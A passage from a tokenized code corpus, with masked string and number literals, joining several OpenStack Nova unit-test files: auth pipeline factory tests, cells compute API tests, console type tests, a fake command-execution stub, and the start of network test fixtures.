<EOL> CONF . set_override ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> app = nova . api . auth . pipeline_factory ( <EOL> TestPipeLineFactory . FakeLoader ( ) , None , noauth2 = fake_pipeline ) <EOL> self . _test_pipeline ( fake_pipeline , app ) <EOL> def test_pipeline_factory_v21 ( self ) : <EOL> fake_pipeline = '<STR_LIT>' <EOL> CONF . set_override ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> app = nova . api . auth . pipeline_factory_v21 ( <EOL> TestPipeLineFactory . 
FakeLoader ( ) , None , noauth2 = fake_pipeline ) <EOL> self . _test_pipeline ( fake_pipeline , app ) <EOL> def test_pipeline_factory_with_rate_limits ( self ) : <EOL> CONF . set_override ( '<STR_LIT>' , True ) <EOL> CONF . set_override ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> fake_pipeline = '<STR_LIT>' <EOL> app = nova . api . auth . pipeline_factory ( <EOL> TestPipeLineFactory . FakeLoader ( ) , None , keystone = fake_pipeline ) <EOL> self . _test_pipeline ( fake_pipeline , app ) <EOL> def test_pipeline_factory_without_rate_limits ( self ) : <EOL> CONF . set_override ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> fake_pipeline1 = '<STR_LIT>' <EOL> fake_pipeline2 = '<STR_LIT>' <EOL> app = nova . api . auth . pipeline_factory ( <EOL> TestPipeLineFactory . FakeLoader ( ) , None , <EOL> keystone_nolimit = fake_pipeline1 , <EOL> keystone = fake_pipeline2 ) <EOL> self . _test_pipeline ( fake_pipeline1 , app ) <EOL> def test_pipeline_factory_missing_nolimits_pipeline ( self ) : <EOL> CONF . set_override ( '<STR_LIT>' , False ) <EOL> CONF . set_override ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> fake_pipeline = '<STR_LIT>' <EOL> app = nova . api . auth . pipeline_factory ( <EOL> TestPipeLineFactory . FakeLoader ( ) , None , keystone = fake_pipeline ) <EOL> self . _test_pipeline ( fake_pipeline , app ) </s>
<s> """<STR_LIT>""" <EOL> import functools <EOL> import inspect <EOL> import mock <EOL> from mox3 import mox <EOL> from oslo_utils import timeutils <EOL> from nova import block_device <EOL> from nova . cells import manager <EOL> from nova . compute import api as compute_api <EOL> from nova . compute import cells_api as compute_cells_api <EOL> from nova . compute import flavors <EOL> from nova . compute import utils as compute_utils <EOL> from nova . compute import vm_states <EOL> import nova . conf <EOL> from nova import context <EOL> from nova import db <EOL> from nova import exception <EOL> from nova import objects <EOL> from nova import quota <EOL> from nova import test <EOL> from nova . tests . unit . compute import test_compute <EOL> from nova . tests . unit import fake_instance <EOL> from nova . tests . unit . objects import test_flavor <EOL> from nova . tests import uuidsentinel as uuids <EOL> ORIG_COMPUTE_API = None <EOL> CONF = nova . conf . CONF <EOL> def stub_call_to_cells ( context , instance , method , * args , ** kwargs ) : <EOL> fn = getattr ( ORIG_COMPUTE_API , method ) <EOL> original_instance = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if original_instance : <EOL> instance = original_instance <EOL> db . instance_update ( context , instance [ '<STR_LIT>' ] , <EOL> dict ( vm_state = instance [ '<STR_LIT>' ] , <EOL> task_state = instance [ '<STR_LIT>' ] ) ) <EOL> saved_quotas = quota . QUOTAS <EOL> quota . QUOTAS = quota . QuotaEngine ( <EOL> quota_driver_class = quota . NoopQuotaDriver ( ) ) <EOL> compute_api . QUOTAS = quota . QUOTAS <EOL> try : <EOL> return fn ( context , instance , * args , ** kwargs ) <EOL> finally : <EOL> quota . QUOTAS = saved_quotas <EOL> compute_api . QUOTAS = saved_quotas <EOL> def stub_cast_to_cells ( context , instance , method , * args , ** kwargs ) : <EOL> fn = getattr ( ORIG_COMPUTE_API , method ) <EOL> original_instance = kwargs . 
pop ( '<STR_LIT>' , None ) <EOL> if original_instance : <EOL> instance = original_instance <EOL> db . instance_update ( context , instance [ '<STR_LIT>' ] , <EOL> dict ( vm_state = instance [ '<STR_LIT>' ] , <EOL> task_state = instance [ '<STR_LIT>' ] ) ) <EOL> saved_quotas = quota . QUOTAS <EOL> quota . QUOTAS = quota . QuotaEngine ( <EOL> quota_driver_class = quota . NoopQuotaDriver ( ) ) <EOL> compute_api . QUOTAS = quota . QUOTAS <EOL> try : <EOL> fn ( context , instance , * args , ** kwargs ) <EOL> finally : <EOL> quota . QUOTAS = saved_quotas <EOL> compute_api . QUOTAS = saved_quotas <EOL> def deploy_stubs ( stubs , api , original_instance = None ) : <EOL> call = stub_call_to_cells <EOL> cast = stub_cast_to_cells <EOL> if original_instance : <EOL> kwargs = dict ( original_instance = original_instance ) <EOL> call = functools . partial ( stub_call_to_cells , ** kwargs ) <EOL> cast = functools . partial ( stub_cast_to_cells , ** kwargs ) <EOL> stubs . Set ( api , '<STR_LIT>' , call ) <EOL> stubs . Set ( api , '<STR_LIT>' , cast ) <EOL> class CellsComputeAPITestCase ( test_compute . ComputeAPITestCase ) : <EOL> def setUp ( self ) : <EOL> super ( CellsComputeAPITestCase , self ) . setUp ( ) <EOL> global ORIG_COMPUTE_API <EOL> ORIG_COMPUTE_API = self . compute_api <EOL> self . flags ( enable = True , group = '<STR_LIT>' ) <EOL> def _fake_validate_cell ( * args , ** kwargs ) : <EOL> return <EOL> self . compute_api = compute_cells_api . ComputeCellsAPI ( ) <EOL> self . stubs . Set ( self . compute_api , '<STR_LIT>' , <EOL> _fake_validate_cell ) <EOL> deploy_stubs ( self . stubs , self . compute_api ) <EOL> def tearDown ( self ) : <EOL> global ORIG_COMPUTE_API <EOL> self . compute_api = ORIG_COMPUTE_API <EOL> super ( CellsComputeAPITestCase , self ) . tearDown ( ) <EOL> def test_instance_metadata ( self ) : <EOL> self . skipTest ( "<STR_LIT>" ) <EOL> def test_evacuate ( self ) : <EOL> @ mock . patch . object ( compute_api . 
API , '<STR_LIT>' ) <EOL> def _test ( mock_evacuate ) : <EOL> instance = objects . Instance ( uuid = uuids . evacuate_instance , <EOL> cell_name = '<STR_LIT>' ) <EOL> dest_host = '<STR_LIT>' <EOL> self . compute_api . evacuate ( self . context , instance , host = dest_host ) <EOL> mock_evacuate . assert_called_once_with ( <EOL> self . context , instance , '<STR_LIT>' ) <EOL> _test ( ) <EOL> def test_error_evacuate ( self ) : <EOL> self . skipTest ( "<STR_LIT>" ) <EOL> def _test_delete_instance_no_cell ( self , method_name ) : <EOL> cells_rpcapi = self . compute_api . cells_rpcapi <EOL> self . mox . StubOutWithMock ( cells_rpcapi , <EOL> '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( compute_api . API , '<STR_LIT>' ) <EOL> inst = self . _create_fake_instance_obj ( ) <EOL> delete_type = method_name == '<STR_LIT>' and '<STR_LIT>' or '<STR_LIT>' <EOL> cells_rpcapi . instance_delete_everywhere ( self . context , <EOL> inst , delete_type ) <EOL> compute_api . API . _local_delete ( self . context , inst , <EOL> mox . IsA ( objects . BlockDeviceMappingList ) , <EOL> method_name , mox . IgnoreArg ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> self . stubs . Set ( self . compute_api . network_api , '<STR_LIT>' , <EOL> lambda * a , ** kw : None ) <EOL> getattr ( self . compute_api , method_name ) ( self . context , inst ) <EOL> def test_delete_instance_no_cell_constraint_failure_does_not_loop ( self ) : <EOL> with mock . patch . object ( self . compute_api . cells_rpcapi , <EOL> '<STR_LIT>' ) : <EOL> inst = self . _create_fake_instance_obj ( ) <EOL> inst . cell_name = None <EOL> inst . destroy = mock . MagicMock ( ) <EOL> inst . destroy . side_effect = exception . ObjectActionError ( action = '<STR_LIT>' , <EOL> reason = '<STR_LIT>' ) <EOL> inst . refresh = mock . MagicMock ( ) <EOL> self . assertRaises ( exception . ObjectActionError , <EOL> self . compute_api . delete , self . context , inst ) <EOL> inst . destroy . 
assert_called_once_with ( ) <EOL> def test_delete_instance_no_cell_constraint_failure_corrects_itself ( self ) : <EOL> def add_cell_name ( context , instance , delete_type ) : <EOL> instance . cell_name = '<STR_LIT>' <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( self . compute_api . cells_rpcapi , <EOL> '<STR_LIT>' , side_effect = add_cell_name ) <EOL> def _test ( mock_delete_everywhere , mock_compute_delete ) : <EOL> inst = self . _create_fake_instance_obj ( ) <EOL> inst . cell_name = None <EOL> inst . destroy = mock . MagicMock ( ) <EOL> inst . destroy . side_effect = exception . ObjectActionError ( action = '<STR_LIT>' , <EOL> reason = '<STR_LIT>' ) <EOL> inst . refresh = mock . MagicMock ( ) <EOL> self . compute_api . delete ( self . context , inst ) <EOL> inst . destroy . assert_called_once_with ( ) <EOL> mock_compute_delete . assert_called_once_with ( self . context , inst ) <EOL> _test ( ) <EOL> def test_delete_instance_no_cell_destroy_fails_already_deleted ( self ) : <EOL> instance = objects . Instance ( uuid = uuids . destroy_instance , <EOL> cell_name = None ) <EOL> actionerror = exception . ObjectActionError ( action = '<STR_LIT>' , reason = '<STR_LIT>' ) <EOL> notfound = exception . InstanceNotFound ( instance_id = instance . uuid ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( self . compute_api . cells_rpcapi , <EOL> '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' , <EOL> side_effect = actionerror ) <EOL> @ mock . patch . object ( instance , '<STR_LIT>' , side_effect = notfound ) <EOL> def _test ( mock_refresh , mock_local_delete , mock_delete_everywhere , <EOL> mock_compute_delete ) : <EOL> self . compute_api . delete ( self . context , instance ) <EOL> mock_delete_everywhere . assert_called_once_with ( self . context , <EOL> instance , '<STR_LIT>' ) <EOL> mock_local_delete . assert_called_once_with ( self . 
context , <EOL> instance , mock . ANY , '<STR_LIT>' , self . compute_api . _do_delete ) <EOL> mock_refresh . assert_called_once_with ( ) <EOL> self . assertFalse ( mock_compute_delete . called ) <EOL> _test ( ) <EOL> def test_delete_instance_no_cell_instance_not_found_already_deleted ( self ) : <EOL> instance = objects . Instance ( uuid = uuids . delete_instance , cell_name = None ) <EOL> notfound = exception . InstanceNotFound ( instance_id = instance . uuid ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( self . compute_api . cells_rpcapi , <EOL> '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' , <EOL> side_effect = notfound ) <EOL> def _test ( mock_local_delete , mock_delete_everywhere , <EOL> mock_compute_delete ) : <EOL> self . compute_api . delete ( self . context , instance ) <EOL> mock_delete_everywhere . assert_called_once_with ( self . context , <EOL> instance , '<STR_LIT>' ) <EOL> mock_local_delete . assert_called_once_with ( self . context , <EOL> instance , mock . ANY , '<STR_LIT>' , self . compute_api . _do_delete ) <EOL> self . assertFalse ( mock_compute_delete . called ) <EOL> _test ( ) <EOL> def test_soft_delete_instance_no_cell ( self ) : <EOL> self . _test_delete_instance_no_cell ( '<STR_LIT>' ) <EOL> def test_delete_instance_no_cell ( self ) : <EOL> self . _test_delete_instance_no_cell ( '<STR_LIT>' ) <EOL> def test_force_delete_instance_no_cell ( self ) : <EOL> self . _test_delete_instance_no_cell ( '<STR_LIT>' ) <EOL> def test_get_migrations ( self ) : <EOL> filters = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:status>' : '<STR_LIT>' } <EOL> migrations = { '<STR_LIT>' : [ { '<STR_LIT:id>' : <NUM_LIT> } ] } <EOL> cells_rpcapi = self . compute_api . cells_rpcapi <EOL> self . mox . StubOutWithMock ( cells_rpcapi , '<STR_LIT>' ) <EOL> cells_rpcapi . get_migrations ( self . context , <EOL> filters ) . AndReturn ( migrations ) <EOL> self . mox . 
ReplayAll ( ) <EOL> response = self . compute_api . get_migrations ( self . context , filters ) <EOL> self . assertEqual ( migrations , response ) <EOL> def test_create_block_device_mapping ( self ) : <EOL> instance_type = { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } <EOL> instance = self . _create_fake_instance_obj ( ) <EOL> bdms = [ block_device . BlockDeviceDict ( { '<STR_LIT>' : '<STR_LIT:image>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> } ) ] <EOL> self . compute_api . _create_block_device_mapping ( <EOL> instance_type , instance . uuid , bdms ) <EOL> bdms = db . block_device_mapping_get_all_by_instance ( <EOL> self . context , instance [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( bdms ) ) <EOL> def test_create_bdm_from_flavor ( self ) : <EOL> self . skipTest ( "<STR_LIT>" ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_rebuild_sig ( self , mock_msg ) : <EOL> def wire ( version ) : <EOL> cells_mgr = manager . CellsManager ( ) <EOL> def cast ( context , method , * args , ** kwargs ) : <EOL> fn = getattr ( cells_mgr , method ) <EOL> fn ( context , * args , ** kwargs ) <EOL> cells_mgr . cast = cast <EOL> return cells_mgr <EOL> cells_rpcapi = self . compute_api . cells_rpcapi <EOL> client = cells_rpcapi . client <EOL> with mock . patch . object ( client , '<STR_LIT>' , side_effect = wire ) : <EOL> inst = self . _create_fake_instance_obj ( ) <EOL> inst . cell_name = '<STR_LIT>' <EOL> cells_rpcapi . rebuild_instance ( self . context , inst , '<STR_LIT>' , None , <EOL> None , None , None , None , <EOL> recreate = False , <EOL> on_shared_storage = False , host = '<STR_LIT:host>' , <EOL> preserve_ephemeral = True , kwargs = None ) <EOL> self . assertEqual ( <NUM_LIT:1> , mock_msg . call_count ) <EOL> class CellsConductorAPIRPCRedirect ( test . NoDBTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( CellsConductorAPIRPCRedirect , self ) . setUp ( ) <EOL> self . 
compute_api = compute_cells_api . ComputeCellsAPI ( ) <EOL> self . cells_rpcapi = mock . MagicMock ( ) <EOL> self . compute_api . compute_task_api . cells_rpcapi = self . cells_rpcapi <EOL> self . context = context . RequestContext ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> def test_build_instances ( self , _checks_for_create_and_rebuild , <EOL> _validate , _get_image , _check_bdm , <EOL> _provision , _record_action_start ) : <EOL> _get_image . return_value = ( None , '<STR_LIT>' ) <EOL> _validate . return_value = ( { } , <NUM_LIT:1> ) <EOL> _check_bdm . return_value = objects . BlockDeviceMappingList ( ) <EOL> _provision . return_value = '<STR_LIT>' <EOL> self . compute_api . create ( self . context , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertTrue ( self . cells_rpcapi . build_instances . called ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_utils , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_utils , '<STR_LIT>' ) <EOL> @ mock . patch . object ( objects . Instance , '<STR_LIT>' ) <EOL> @ mock . patch . object ( flavors , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( objects . BlockDeviceMappingList , '<STR_LIT>' ) <EOL> def test_resize_instance ( self , _bdms , _check , _extract , _save , _upsize , <EOL> _reserve , _cells , _record ) : <EOL> flavor = objects . Flavor ( ** test_flavor . fake_flavor ) <EOL> _extract . 
return_value = flavor <EOL> orig_system_metadata = { } <EOL> instance = fake_instance . fake_instance_obj ( self . context , <EOL> vm_state = vm_states . ACTIVE , cell_name = '<STR_LIT>' , <EOL> launched_at = timeutils . utcnow ( ) , <EOL> system_metadata = orig_system_metadata , <EOL> expected_attrs = [ '<STR_LIT>' ] ) <EOL> instance . flavor = flavor <EOL> instance . old_flavor = instance . new_flavor = None <EOL> self . compute_api . resize ( self . context , instance ) <EOL> self . assertTrue ( self . cells_rpcapi . resize_instance . called ) <EOL> @ mock . patch . object ( objects . RequestSpec , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( objects . Instance , '<STR_LIT>' ) <EOL> def test_live_migrate_instance ( self , instance_save , _record , _get_spec ) : <EOL> orig_system_metadata = { } <EOL> instance = fake_instance . fake_instance_obj ( self . context , <EOL> vm_state = vm_states . ACTIVE , cell_name = '<STR_LIT>' , <EOL> launched_at = timeutils . utcnow ( ) , <EOL> system_metadata = orig_system_metadata , <EOL> expected_attrs = [ '<STR_LIT>' ] ) <EOL> self . compute_api . live_migrate ( self . context , instance , <EOL> True , True , '<STR_LIT>' ) <EOL> self . assertTrue ( self . cells_rpcapi . live_migrate_instance . called ) <EOL> @ mock . patch . object ( objects . Instance , '<STR_LIT>' ) <EOL> @ mock . patch . object ( objects . Instance , '<STR_LIT>' ) <EOL> @ mock . patch . object ( objects . BlockDeviceMappingList , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . 
API , '<STR_LIT>' ) <EOL> def test_rebuild_instance ( self , _record_action_start , <EOL> _checks_for_create_and_rebuild , _check_auto_disk_config , <EOL> _get_image , bdm_get_by_instance_uuid , get_flavor , instance_save ) : <EOL> orig_system_metadata = { } <EOL> instance = fake_instance . fake_instance_obj ( self . context , <EOL> vm_state = vm_states . ACTIVE , cell_name = '<STR_LIT>' , <EOL> launched_at = timeutils . utcnow ( ) , <EOL> system_metadata = orig_system_metadata , <EOL> expected_attrs = [ '<STR_LIT>' ] ) <EOL> get_flavor . return_value = '<STR_LIT>' <EOL> image_href = '<STR_LIT>' <EOL> image = { "<STR_LIT>" : <NUM_LIT:10> , "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> admin_pass = '<STR_LIT>' <EOL> files_to_inject = [ ] <EOL> bdms = objects . BlockDeviceMappingList ( ) <EOL> _get_image . return_value = ( None , image ) <EOL> bdm_get_by_instance_uuid . return_value = bdms <EOL> self . compute_api . rebuild ( self . context , instance , image_href , <EOL> admin_pass , files_to_inject ) <EOL> self . assertTrue ( self . cells_rpcapi . rebuild_instance . called ) <EOL> def test_check_equal ( self ) : <EOL> task_api = self . compute_api . compute_task_api <EOL> tests = set ( ) <EOL> for ( name , value ) in inspect . getmembers ( self , inspect . ismethod ) : <EOL> if name . startswith ( '<STR_LIT>' ) and name != '<STR_LIT>' : <EOL> tests . add ( name [ <NUM_LIT:5> : ] ) <EOL> if tests != set ( task_api . cells_compatible ) : <EOL> self . fail ( "<STR_LIT>" ) <EOL> class CellsComputePolicyTestCase ( test_compute . ComputePolicyTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( CellsComputePolicyTestCase , self ) . setUp ( ) <EOL> global ORIG_COMPUTE_API <EOL> ORIG_COMPUTE_API = self . compute_api <EOL> self . compute_api = compute_cells_api . ComputeCellsAPI ( ) <EOL> deploy_stubs ( self . stubs , self . compute_api ) <EOL> def tearDown ( self ) : <EOL> global ORIG_COMPUTE_API <EOL> self . 
compute_api = ORIG_COMPUTE_API <EOL> super ( CellsComputePolicyTestCase , self ) . tearDown ( ) </s>
<s> from nova . console import type as ctype <EOL> from nova import test <EOL> class TypeTestCase ( test . NoDBTestCase ) : <EOL> def test_console ( self ) : <EOL> c = ctype . Console ( host = '<STR_LIT:127.0.0.1>' , port = <NUM_LIT> ) <EOL> self . assertTrue ( hasattr ( c , '<STR_LIT:host>' ) ) <EOL> self . assertTrue ( hasattr ( c , '<STR_LIT:port>' ) ) <EOL> self . assertTrue ( hasattr ( c , '<STR_LIT>' ) ) <EOL> self . assertEqual ( '<STR_LIT:127.0.0.1>' , c . host ) <EOL> self . assertEqual ( <NUM_LIT> , c . port ) <EOL> self . assertIsNone ( c . internal_access_path ) <EOL> self . assertEqual ( { <EOL> '<STR_LIT:host>' : '<STR_LIT:127.0.0.1>' , <EOL> '<STR_LIT:port>' : <NUM_LIT> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> c . get_connection_info ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def test_console_vnc ( self ) : <EOL> c = ctype . ConsoleVNC ( host = '<STR_LIT:127.0.0.1>' , port = <NUM_LIT> ) <EOL> self . assertIsInstance ( c , ctype . Console ) <EOL> def test_console_rdp ( self ) : <EOL> c = ctype . ConsoleRDP ( host = '<STR_LIT:127.0.0.1>' , port = <NUM_LIT> ) <EOL> self . assertIsInstance ( c , ctype . Console ) <EOL> def test_console_spice ( self ) : <EOL> c = ctype . ConsoleSpice ( host = '<STR_LIT:127.0.0.1>' , port = <NUM_LIT> , tlsPort = <NUM_LIT> ) <EOL> self . assertIsInstance ( c , ctype . Console ) <EOL> self . assertEqual ( <NUM_LIT> , c . tlsPort ) <EOL> self . assertEqual ( <EOL> <NUM_LIT> , c . get_connection_info ( '<STR_LIT>' , '<STR_LIT>' ) [ '<STR_LIT>' ] ) <EOL> def test_console_serial ( self ) : <EOL> c = ctype . ConsoleSerial ( host = '<STR_LIT:127.0.0.1>' , port = <NUM_LIT> ) <EOL> self . assertIsInstance ( c , ctype . Console ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> from eventlet import greenthread <EOL> from oslo_concurrency import processutils <EOL> from oslo_log import log as logging <EOL> import six <EOL> LOG = logging . getLogger ( __name__ ) <EOL> _fake_execute_repliers = [ ] <EOL> _fake_execute_log = [ ] <EOL> def fake_execute_get_log ( ) : <EOL> return _fake_execute_log <EOL> def fake_execute_clear_log ( ) : <EOL> global _fake_execute_log <EOL> _fake_execute_log = [ ] <EOL> def fake_execute_set_repliers ( repliers ) : <EOL> """<STR_LIT>""" <EOL> global _fake_execute_repliers <EOL> _fake_execute_repliers = repliers <EOL> def fake_execute_default_reply_handler ( * ignore_args , ** ignore_kwargs ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' , '<STR_LIT>' <EOL> def fake_execute ( * cmd_parts , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> global _fake_execute_repliers <EOL> process_input = kwargs . get ( '<STR_LIT>' , None ) <EOL> check_exit_code = kwargs . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> delay_on_retry = kwargs . get ( '<STR_LIT>' , True ) <EOL> attempts = kwargs . get ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> run_as_root = kwargs . get ( '<STR_LIT>' , False ) <EOL> cmd_str = '<STR_LIT:U+0020>' . join ( str ( part ) for part in cmd_parts ) <EOL> LOG . debug ( "<STR_LIT>" , cmd_str ) <EOL> _fake_execute_log . append ( cmd_str ) <EOL> reply_handler = fake_execute_default_reply_handler <EOL> for fake_replier in _fake_execute_repliers : <EOL> if re . match ( fake_replier [ <NUM_LIT:0> ] , cmd_str ) : <EOL> reply_handler = fake_replier [ <NUM_LIT:1> ] <EOL> LOG . debug ( '<STR_LIT>' , fake_replier [ <NUM_LIT:0> ] ) <EOL> break <EOL> if isinstance ( reply_handler , six . 
string_types ) : <EOL> reply = reply_handler , '<STR_LIT>' <EOL> else : <EOL> try : <EOL> reply = reply_handler ( cmd_parts , <EOL> process_input = process_input , <EOL> delay_on_retry = delay_on_retry , <EOL> attempts = attempts , <EOL> run_as_root = run_as_root , <EOL> check_exit_code = check_exit_code ) <EOL> except processutils . ProcessExecutionError as e : <EOL> LOG . debug ( '<STR_LIT>' , e ) <EOL> raise <EOL> LOG . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , { '<STR_LIT>' : reply [ <NUM_LIT:0> ] , '<STR_LIT>' : reply [ <NUM_LIT:1> ] } ) <EOL> greenthread . sleep ( <NUM_LIT:0> ) <EOL> return reply <EOL> def stub_out_processutils_execute ( stubs ) : <EOL> fake_execute_set_repliers ( [ ] ) <EOL> fake_execute_clear_log ( ) <EOL> stubs . Set ( processutils , '<STR_LIT>' , fake_execute ) </s>
<s> import calendar <EOL> import datetime <EOL> import os <EOL> import re <EOL> import time <EOL> import mock <EOL> from mox3 import mox <EOL> import netifaces <EOL> from oslo_concurrency import processutils <EOL> from oslo_config import cfg <EOL> from oslo_serialization import jsonutils <EOL> from oslo_utils import fileutils <EOL> from oslo_utils import timeutils <EOL> from nova import context <EOL> from nova import db <EOL> from nova import exception <EOL> from nova . network import driver <EOL> from nova . network import linux_net <EOL> from nova . network import model as network_model <EOL> from nova import objects <EOL> from nova import test <EOL> from nova import utils <EOL> CONF = cfg . CONF <EOL> CONF . import_opt ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> CONF . import_opt ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> HOST = "<STR_LIT>" <EOL> instances = { '<STR_LIT>' : <EOL> { '<STR_LIT:id>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : datetime . datetime ( <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : datetime . datetime ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : <EOL> { '<STR_LIT:id>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : datetime . datetime ( <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : datetime . datetime ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : <EOL> { '<STR_LIT:id>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : datetime . datetime ( <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : datetime . 
datetime ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' } } <EOL> addresses = [ { "<STR_LIT:address>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:address>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:address>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:address>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:address>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:address>" : "<STR_LIT>" } ] <EOL> networks = [ { '<STR_LIT:id>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT:host>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT:host>' : None , <EOL> 